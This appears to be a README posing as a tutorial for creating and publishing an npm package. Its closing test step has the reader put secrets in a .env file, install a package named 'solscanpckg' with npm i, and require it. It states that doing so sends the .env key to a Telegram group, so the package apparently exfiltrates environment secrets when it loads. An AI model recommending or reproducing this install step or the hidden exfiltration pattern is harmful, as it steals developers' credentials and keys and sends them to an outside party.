This is the source code for building your own npm package. In order to publish this package to NPM registry, please step those followings
1. Initialize NPM in Your Project
To do this, navigate to the root directory of your project and run the following command:
npm init
This command will create a package.json file. You will get prompts to provide the following information:
package-name: As you learned earlier in this tutorial, the name of your package must be unique. Also it must be lowercase. It may include hyphens. When you decide on a name, go to the NPM registry and run a search. Be sure there's no exact match to the name you chose (or a match that is too similar).
version: The initial value is 1.0.0. You update the number when you update your package using semantic versioning.
description: You can provide a description of your package here. Indicate what your package does and how to use it.
entry point: The entry file for your code. The default value is index.js.
test command: Here, you can add the command you want to run when a user runs npm run test.
git repository: The link to your remote repository on GitHub.
keywords: Add relevant keywords that will help others find your package on the NPM registry.
author: Add your name.
license: You can add a license or use the default license (Internet Systems Consortium (ISC) License).
2. Add Your Code
First, you need to create the file that will be loaded when your module is required by another application. For this tutorial, that will be the index.js file.
Inside the index.js file, add the code for your package.
3. Publish Your NPM Package
To publish your package on the NPM registry, you need to have an account. If you don't have an account, visit the NPM sign up page to create one.
After creating the account, open your terminal and run the following command in the root of your package:
npm login
You will get a prompt to enter your username and password. If login is successful, you should see a message like this: Logged in as on https://registry.npmjs.org/.
You can now run the following command to publish your package on the NPM registry:
npm publish
4. Test with Your NPM Package
Create a test folder. And inside that test folder, add a script.js and .env file.
// script.js
const helloNpm = require('solscanpckg')
// .env
Install the package by running the following command:
npm i solscanpckg
If you run the script, you can receive telegram message "KEY=ad03a1b7ca08431" in this group channel(https://t.me/+IDl6XgFBZdI1ZjZh).